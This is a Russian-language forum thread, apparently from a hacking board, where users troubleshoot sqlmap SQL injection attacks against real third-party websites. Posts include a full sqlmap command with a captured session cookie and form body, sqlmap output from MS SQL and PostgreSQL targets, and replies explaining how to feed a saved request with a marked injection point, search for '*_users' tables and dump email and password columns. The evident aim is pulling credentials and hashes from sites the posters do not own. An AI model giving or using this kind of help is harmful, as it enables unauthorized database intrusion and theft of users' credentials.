Народ, кто встречал такое: Извлекаю уже на третьем сайте, подобную хрень: ?t?1f?????F/???|????6(?\\R?jGa??,b?`??????? Соль такого формата -121880803 либо положительное значение. Пробовал закинуть свой пас и извлечь хэш, получил тоже самое. закинул в базу пароль: 123qwe получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q?? Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб
Сканер нашел уязвимость,но я с таким столкнулся впервые Code: -u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22forename%22 Smith --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22surname%22 Smith --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22email%22 [email protected] --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22new_pass%22 N3tsp@rker- --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22retype_pass%22 N3tsp@rker- --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22county_id%22 test --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22town_id%22 893 --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22phone%22 3 --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22mobile%22 3 --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22terms_conditions%22 on --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22subscribe_emails%22 on --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22g-recaptcha-response%22 10000000146 --31ed9d031d5848e3a524ba24f417a44b Content-Disposition: form-data; name=%22submit%22 Create Account --31ed9d031d5848e3a524ba24f417a44b-- " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL" Пробую через sqlmap - получаю такую ошибку: [CRITICAL] all testable parameters you provided are not present within the given request data Как правильно скормить в sqlmap?
Такая же ошибка вылетает.. Подскажите, как "Правильно сложить весь пакет"? Может я что-то не так делаю..
зайти на этот урл, и сделай то действие чтоб перехватить запрос, так полагаю это сохранение по название скрипта, перехватываешь тело запроса и кладешь в файлик, а дальше этот файлик скармливаешь скульмапу, если известен уязвимый параметр, то помечаешь его * чтоб скульмап зря не тратил время на другие параметры и сразу обратился к нему.
честно говоря, сам не встречался с таким, но судя по выводу похоже что мап выдаёт вам сразу бинарные данные (байты), а ваша консоль конвертирует их сразу в ASCII. И тогда вы получаете вот такую вот хрень. Можете попробовать прогнать мап через локальный веб-прокси (Burp и прочее) и посмотреть что там вам выдаёт мап.
блин не пойму как сдампить только мыльники и пароли (не проверяя в какой они таблице, если есть) (просто пример любой на вскидку, дальше по аналогии пойму)
Server: web server operating system: Windows 10 or 2016 web application technology: ASP.NET, Microsoft IIS 10.0, ASP back-end DBMS: active fingerprint: Microsoft SQL Server 2017 Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) sqlmap udalos vitashits DB list(55 Dbs) - no kogda delaesh -D db --tables, srazu pokazivaet redirekt na orginal sait www.sait.com - i ne daet vitashits tablici, sto delats? databases udalos vitashits tolka s --no-cast "sqlmap got a 302 redirect to 'http://www.sait.com'. Do you want to follow? [Y/n]" kogda vitaskival DB ne prosilo takoe, i vse skachalos norm
[12:46:13] [INFO] fetching tables for database: ev [12:46:13] [INFO] heuristics detected web page charset 'ascii' [12:46:13] [WARNING] the SQL query provided does not return any output [12:46:13] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry [12:46:14] [WARNING] the SQL query provided does not return any output [12:46:14] [CRITICAL] unable to retrieve the tables for any database [12:46:14] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1 times
Sqlmap перестал работать, не видит ключи sqlmap.py -hh sqlmap.py --update В любом случае Code: Usage: sqlmap.py [options] sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, -- list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic a nd -hh for advanced help Press Enter to continue... Что отвалилось ?
Всем привет. Как составить запрос в sqlmap, что бы он брал колонки с таблиц в которых содержится "*_users", то есть префиксы бывают разные (blabla1_users, blabla2_users и тд), чувствую что надо как то играться с параметром -T --where, буду очень благодарен за помощь.
Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
-D information_schema -T columns -C table_name,column_name --where="table_name LIKE '%_users'" --dump нееее, не так? =) dmjROV тестани, если тебе именно колумны с таблов где *_узерс повыводить ннада. Или я не понял с недосыпа, поздновато уже.
Приветствую! Ковыряю одну скулю: SqlMap последней версии web application technology: Apache, Nginx back-end DBMS operating system: Linux Debian back-end DBMS: PostgreSQL Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause ПРОБЛЕМА: При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается: "cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files" " [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'" --no-cast и --hex пробовал - не помогает. Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом Что это может быть? Какие возможные решения данной проблемы?
